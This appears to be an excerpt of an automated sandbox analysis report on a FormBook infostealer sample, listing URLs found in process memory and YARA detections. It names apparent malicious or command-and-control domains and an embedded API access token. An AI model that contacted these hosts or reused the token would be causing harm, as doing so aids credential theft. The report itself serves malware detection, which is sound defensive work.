                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/468c40599126.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/565f40599029.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/736e40598858.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/776b40598818.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/830f499165.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/87c40599507.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/912f40598682.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/927a399069.html
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/baishimolinair/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/cangjingkong/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/dnjw/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/gongdilan/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/guchuanyizhi/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/1/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/10/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/2/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/3/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/4/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/5/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/6/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/7/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/8/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/jiuzhonghuannai/9/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/julisha/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/lingcunaili/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/mingrihuaqiluo/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/ruocainaiyang/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/shuiyechaoyang/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/shuiyechaoyangh/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/sitemap.xml
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/template/news/news10/css/layout.css
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/xiaotianyou/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/xidaoailiw/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/yasendi/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/youtianzhenxi/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/zuozuomumingxi/
                    Source: vWFGbvOdxI.exe, 00000012.00000002.4502147682.0000000005126000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hasan.cloud
                    Source: vWFGbvOdxI.exe, 00000012.00000002.4502147682.0000000005126000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hasan.cloud/tur7/
                    Source: vWFGbvOdxI.exe, 00000012.00000002.4500346640.00000000039E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://zrinorem-srumimit.sbs/
                    Source: vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003D04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://0dyos.com
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: Documents.exe, uFEeKIucsX.exe.0.drString found in binary or memory: https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cs.deviceatlas-cdn.com
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cs.deviceatlas-cdn.com/101dacs.js
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cs.deviceatlas-cdn.com/smartclick
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: systray.exe, 00000011.00000002.4498880450.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: systray.exe, 00000011.00000002.4498880450.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                    Source: systray.exe, 00000011.00000002.4498880450.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                    Source: systray.exe, 00000011.00000002.4498880450.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: systray.exe, 00000011.00000002.4498880450.00000000006E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                    Source: systray.exe, 00000011.00000003.2522848607.00000000074C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://my.101domain.com?utm_campaign=parked-page&utm_medium=referral&utm_source=carpentry.club&utm_
                    Source: vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/css/fonts/LatoRegular.woff)
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/css/fonts/LatoRegular.woff2
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/css/fonts/LatoRegular.woff2)
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/css/vendor-1.css?20240925050808
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/101domain-logo.svg
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/com.png
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/google-reviews.svg
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/google_workspace.png
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/icon/101domain.ico
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/park-back.jpg
                    Source: vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/park-back.webp
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/images/vendor-1/trustpilot.svg
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/js/jquery-3.6.0.min.js?20240925050808
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/js/modernizr-webp.js?20240925050808
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://park.101datacenter.net/js/pricing.js?20240925050808
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/brand_services.htm?utm_campaign=parked-page&utm_medium=referral&utm_source
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/country_domain.htm?utm_campaign=parked-page&utm_medium=referral&utm_source
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/domain-availability-search.htm?utm_campaign=parked-page&utm_medium=referra
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/domain-registration.htm?utm_campaign=parked-page&utm_medium=referral&utm_s
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/domain_concierge_service.htm?query=carpentry.club&utm_campaign=parked-page
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/domain_monitoring_trademark_enforcement_guide.htm
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/external_links.htm
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/gmail_email_aliases.htm
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/google_workspace.htm?utm_campaign=parked-page&utm_medium=referral&utm_sour
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/new_gtld_extensions.htm?utm_campaign=parked-page&utm_medium=referral&utm_s
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/resource_center.htm
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.101domain.com/web_hosting.htm?utm_campaign=parked-page&utm_medium=referral&utm_source=ca
                    Source: Documents.exe, uFEeKIucsX.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005ED8000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000004028000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.financestrategists.com/founder-spotlight/best-corporate-domain-registrar-independent-101
                    Source: systray.exe, 00000011.00000003.2527658066.00000000074EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: systray.exe, 00000011.00000002.4500910385.0000000005248000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003398000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.losmason.shop/s15n/?QhKxhNP=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY
                    Source: systray.exe, 00000011.00000002.4502624257.0000000007210000.00000004.00000800.00020000.00000000.sdmp, systray.exe, 00000011.00000002.4500910385.0000000005A22000.00000004.10000000.00040000.00000000.sdmp, vWFGbvOdxI.exe, 00000012.00000002.4500346640.0000000003B72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ziyuan.baidu.com/image.gif

                    E-Banking Fraud

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.4500125760.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.4498734635.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.4500198635.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2339787064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.4502147682.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2340363739.0000000001450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2342055723.00000000019E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.4500549685.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                    System Summary

                    barindex
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: Documents.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0042C7C3 NtClose,9_2_0042C7C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522B60 NtClose,LdrInitializeThunk,9_2_01522B60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_01522DF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_01522C70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015235C0 NtCreateMutant,LdrInitializeThunk,9_2_015235C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01524340 NtSetContextThread,9_2_01524340
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01524650 NtSuspendThread,9_2_01524650
